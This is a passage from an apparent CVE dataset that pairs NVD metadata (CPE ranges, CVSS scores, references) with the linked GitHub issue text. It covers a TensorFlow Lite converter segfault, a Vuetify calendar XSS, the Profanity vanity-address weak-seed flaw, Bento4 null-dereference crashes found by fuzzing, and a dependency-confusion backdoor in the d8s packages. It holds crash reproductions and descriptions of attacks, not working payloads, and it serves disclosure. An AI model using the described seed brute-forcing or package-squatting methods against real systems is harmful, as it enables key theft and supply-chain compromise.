"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FE4F8A81-6CC2-4F7F-9602-C170FDD926E7",
"versionEndExcluding": "2.9.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.9.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.10:rc0:*:*:*:*:*:*",
"matchCriteriaId": "1DBFBCE2-0A01-4575-BE45-6775ABFB8B28",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.10:rc1:*:*:*:*:*:*",
"matchCriteriaId": "89806CF9-E423-4CA6-A01A-8175C260CB24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.10:rc2:*:*:*:*:*:*",
"matchCriteriaId": "F2B80690-A257-4E16-BD27-9AE045BC56ED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:2.10:rc3:*:*:*:*:*:*",
"matchCriteriaId": "F335F9A4-5AB8-4E53-BC18-E01F7C653E5E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"20"
] | 20 | https://github.com/tensorflow/tensorflow/issues/53767 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | When converting transposed convolutions using per-channel weight quantization the converter segfaults and crashes the Python process. Per-channel quantization is supported by TFLite Transposed convolutions:
https://github.com/tensorflow/tensorflow/blob/f87be6c7de847017c48520649e3d771e5d6b81b6/tensorflow/lite/kernels/transpose_conv.cc#L371-L380
so the converter shouldn't segfault when trying to convert such a model.
It looks like this issue has been introduced in TensorFlow 2.6 since the same model code produced a valid TFLite file in TensorFlow 2.5. This issue might also be related to #53766, but in any case the converter should never segfault.
### 1. System information
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): macOS / Ubuntu
- TensorFlow installation (pip package or built from source): pip package
- TensorFlow library (version, if pip package or github SHA, if built from source): 2.6, 2.7, 2.8rc0 and 2.9.0-dev20220114
### 2. Code
A minimal reproduction of the issue and a workaround is available in [this notebook](https://colab.research.google.com/drive/1IXri5HeDc9qTAtDOp-LqZyQTL8CcemGq?usp=sharing).
```python
import tensorflow as tf
class QuantConv2DTransposed(tf.keras.layers.Layer):
def build(self, input_shape):
self.kernel = self.add_weight("kernel", [3, 3, input_shape[-1], 24])
def call(self, inputs):
filters = tf.quantization.fake_quant_with_min_max_vars_per_channel(
self.kernel, -3.0 * tf.ones([24]), 3.0 * tf.ones([24]), narrow_range=True
)
filters = tf.transpose(filters, (0, 1, 3, 2))
return tf.nn.conv2d_transpose(inputs, filters, [*inputs.shape[:-1], 24], 1)
inp = tf.keras.Input(shape=(6, 8, 48), batch_size=1)
x = tf.quantization.fake_quant_with_min_max_vars(inp, -3.0, 3.0, narrow_range=True)
x = QuantConv2DTransposed()(x)
x = tf.quantization.fake_quant_with_min_max_vars(x, -3.0, 3.0, narrow_range=True)
model = tf.keras.Model(inp, x)
model.save("/tmp/testing")
converter = tf.lite.TFLiteConverter.from_saved_model("/tmp/testing")
converter.optimizations = [tf.lite.Optimize.DEFAULT]
# terminated by signal SIGSEGV (Address boundary error)
tflite_model = converter.convert()
``` | TFLite Converter segfaults when trying to convert per-channel quantized transposed convolutions | https://api.github.com/repos/tensorflow/tensorflow/issues/53767/comments | 9 | 2022-01-14T18:55:01Z | 2024-11-01T02:08:27Z | https://github.com/tensorflow/tensorflow/issues/53767 | 1,104,010,260 | 53,767 | 4,165 |
CVE-2022-25873 | 2022-09-18T15:15:09.660 | The package vuetify from 2.0.0-beta.4 and before 2.6.10 are vulnerable to Cross-site Scripting (XSS) due to improper input sanitization in the 'eventName' function within the VCalendar component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 2.5,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://codepen.io/5v3n-08/pen/MWGKEjY"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/vuetifyjs/vuetify/commit/ade1434927f55a0eccf3d54f900f24c5fa85a176"
},
{
"source": "report@snyk.io",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vuetifyjs/vuetify/issues/15757"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBVUETIFYJS-3024407"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3024406"
},
{
"source": "report@snyk.io",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-VUETIFY-3019858"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://codepen.io/5v3n-08/pen/MWGKEjY"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/vuetifyjs/vuetify/commit/ade1434927f55a0eccf3d54f900f24c5fa85a176"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/vuetifyjs/vuetify/issues/15757"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBVUETIFYJS-3024407"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3024406"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.snyk.io/vuln/SNYK-JS-VUETIFY-3019858"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5717CAE6-B23D-4EE0-88A8-5A98FF6D68E2",
"versionEndExcluding": "2.6.10",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta4:*:*:*:*:*:*",
"matchCriteriaId": "C8EA2D38-E38D-4913-82FF-949BD4358B6A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta5:*:*:*:*:*:*",
"matchCriteriaId": "3B9DD644-5DC7-4297-B2B7-318242E112AD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta6:*:*:*:*:*:*",
"matchCriteriaId": "2BF63ECA-F9A5-4269-ACF1-717401F5A6FB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta7:*:*:*:*:*:*",
"matchCriteriaId": "6C2F172F-EB66-4864-8D7A-F15BDFCBD84D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta8:*:*:*:*:*:*",
"matchCriteriaId": "ADE7EEE9-F3C0-46E7-87BD-1BEB43B73945",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta9:*:*:*:*:*:*",
"matchCriteriaId": "2E21A173-87E5-4F49-A9A4-5018664D3576",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/vuetifyjs/vuetify/issues/15757 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"vuetifyjs",
"vuetify"
] | ### Environment
**Vuetify Version:** 2.6.9
**Vue Version:** 2.6.14
**Browsers:** Chrome 105.0.0.0
**OS:** Mac OS 10.15.7
### Steps to reproduce
Open the link and see the alert with xss.
### Expected Behavior
Not use plain html
### Actual Behavior
html is used and open an alert
### Reproduction Link
<a href="https://codepen.io/5v3n-08/pen/MWGKEjY" target="_blank">https://codepen.io/5v3n-08/pen/MWGKEjY</a>
### Other comments
Only work if this property is set
:event-name="getCalendarEventName"
<!-- generated by vuetify-issue-helper. DO NOT REMOVE --> | [Bug Report][2.6.9] xss in v-calendar | https://api.github.com/repos/vuetifyjs/vuetify/issues/15757/comments | 0 | 2022-09-08T11:29:39Z | 2022-09-08T14:43:19Z | https://github.com/vuetifyjs/vuetify/issues/15757 | 1,366,110,081 | 15,757 | 4,166 |
CVE-2022-40769 | 2022-09-18T17:15:09.667 | profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an-ethereum-vanity-address-tool-68ed7455fc8c"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/johguse/profanity"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/johguse/profanity/issues/61"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an-ethereum-vanity-address-tool-68ed7455fc8c"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/johguse/profanity"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/johguse/profanity/issues/61"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:profanity_project:profanity:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16E1CC96-F6AE-40E6-8DEE-1FAD971A615B",
"versionEndExcluding": null,
"versionEndIncluding": "1.60",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"338"
] | 338 | https://github.com/johguse/profanity/issues/61 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"johguse",
"profanity"
] | Hi, could you elaborate on how private keys are being generated and brute forced? It seems like a reliable random number generator `std::mt19937_64` is being fully initialized by `unsigned int` (https://en.cppreference.com/w/cpp/numeric/random/random_device), which could make it less reliable:
https://github.com/johguse/profanity/blob/75afbade7d4e8a54bd97b26249a84d2833a25b58/Dispatcher.cpp#L111
Seems like brute-forcing 2^32 seeds, each for a few seconds on top-notch hardware could expose some keys with 5-6-7 mined symbol.
| Private key safety | https://api.github.com/repos/johguse/profanity/issues/61/comments | 4 | 2022-01-17T08:50:54Z | 2022-09-15T07:42:49Z | https://github.com/johguse/profanity/issues/61 | 1,105,545,328 | 61 | 4,167 |
CVE-2022-40774 | 2022-09-18T19:15:09.277 | An issue was discovered in Bento4 through 1.6.0-639. There is a NULL pointer dereference in AP4_StszAtom::GetSampleSize. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/757"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/757"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*",
"matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0-639",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/axiomatic-systems/Bento4/issues/757 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hi There,
I tested the binary mp42ts with my fuzzer, and a crash incurred, i.e., SEGV on an unknown address error. Here are the details:
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==6287==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007021ab bp 0x7fff9e86cb50 sp 0x7fff9e86c5f0 T0)
==6287==The signal is caused by a READ memory access.
==6287==Hint: address points to the zero page.
#0 0x7021ab in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) (/fuzztest/mp42ts/mp42ts+0x7021ab)
#1 0x5754fc in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) (/fuzztest/mp42ts/mp42ts+0x5754fc)
#2 0x40d0cb in TrackSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) (/fuzztest/mp42ts/mp42ts+0x40d0cb)
#3 0x418342 in main (/fuzztest/mp42ts/mp42ts+0x418342)
#4 0x7f9ae1a41c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#5 0x407c99 in _start (/fuzztest/mp42ts/mp42ts+0x407c99)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp42ts/mp42ts+0x7021ab) in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)
==6287==ABORTING
```
### System Details
Test Machine: Ubuntu 18.04 (docker)
Project Name: mp42ts (Bento4-1.6.0-639)
### Command
./mp42ts mp42ts.demo /dev/null
### Poc
[mp42ts_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9590796/mp42ts_Poc.zip)
### Credit
Wanying Cao (NCNIPC of China), (Zhongguancun Laboratory)
Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory)
| SEGV at AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) in binary mp42ts | https://api.github.com/repos/axiomatic-systems/Bento4/issues/757/comments | 2 | 2022-09-17T03:04:47Z | 2023-06-26T09:40:27Z | https://github.com/axiomatic-systems/Bento4/issues/757 | 1,376,646,543 | 757 | 4,168 |
CVE-2022-40775 | 2022-09-18T19:15:09.323 | An issue was discovered in Bento4 through 1.6.0-639. A NULL pointer dereference occurs in AP4_StszAtom::WriteFields. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/758"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/758"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*",
"matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0",
"versionEndExcluding": null,
"versionEndIncluding": "1.6.0-639",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/axiomatic-systems/Bento4/issues/758 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | Hi there, I use my fuzzer for fuzzing the binary mp4decrypt, and this binary crashes with the following:
```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==24087==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000702ee8 bp 0x7ffcf40a75f0 sp 0x7ffcf40a73b0 T0)
==24087==The signal is caused by a READ memory access.
==24087==Hint: address points to the zero page.
#0 0x702ee8 in AP4_StszAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8)
#1 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
#2 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
#3 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
#4 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
#5 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
#6 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
#7 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
#8 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
#9 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
#10 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423)
#11 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf)
#12 0x62cea7 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzztest/mp4decrypt/mp4decrypt+0x62cea7)
#13 0x412846 in main (/fuzztest/mp4decrypt/mp4decrypt+0x412846)
#14 0x7fcaa49f1c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#15 0x407c99 in _start (/fuzztest/mp4decrypt/mp4decrypt+0x407c99)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8) in AP4_StszAtom::WriteFields(AP4_ByteStream&)
==24087==ABORTING
```
### System Details
Test Machine: Ubuntu 18.04 (docker)
Project Name: mp4decrypt (Bento4-1.6.0-639)
### Command
./mp4decrypt mp4decrypt.demo /dev/null
### Poc
[mp4decrypt_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9591036/mp4decrypt_Poc.zip)
### Credit
Wanying Cao(NCNIPC of China), (Zhongguancun Laboratory)
Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory) | SEGV error | https://api.github.com/repos/axiomatic-systems/Bento4/issues/758/comments | 0 | 2022-09-17T06:02:37Z | 2023-06-26T09:41:06Z | https://github.com/axiomatic-systems/Bento4/issues/758 | 1,376,678,566 | 758 | 4,169 |
CVE-2022-38881 | 2022-09-19T16:15:11.540 | The d8s-archives for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-archives/issues/12"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-archives/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-archives/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-archives/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-archives_project:d8s-archives:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "83A7837F-25C6-41FC-ADB1-B4FDD9C884F2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-archives/issues/12 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-archives"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-archives==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI | code execution backdoor | https://api.github.com/repos/democritus-project/d8s-archives/issues/12/comments | 0 | 2022-08-26T03:29:25Z | 2022-08-26T03:33:10Z | https://github.com/democritus-project/d8s-archives/issues/12 | 1,351,697,173 | 12 | 4,170 |
CVE-2022-38882 | 2022-09-19T16:15:11.583 | The d8s-json for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-json/issues/9"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-json/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-json/issues/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-json/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://pypi.org/project/democritus-strings/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:d8s-json_project:d8s-json:0.1.0:*:*:*:*:python:*:*",
"matchCriteriaId": "93EB4C67-F5D4-4542-A457-7F1D29616363",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/democritus-project/d8s-json/issues/9 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"democritus-project",
"d8s-json"
] | We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us.

The democritus-strings package can be successfully installed using `pip install d8s-json==0.1.0`

Suggestion: remove version 0.1.0 of this project in PyPI | code execution backdoor | https://api.github.com/repos/democritus-project/d8s-json/issues/9/comments | 0 | 2022-08-26T04:27:15Z | 2022-08-26T04:27:15Z | https://github.com/democritus-project/d8s-json/issues/9 | 1,351,729,055 | 9 | 4,171 |
CVE-2022-38883 | 2022-09-19T16:15:11.627 | The d8s-math for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/democritus-project/d8s-math/issues/11"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://pypi.org/project/d8s-math/"
},
{
"source": "cve@mitre.org",
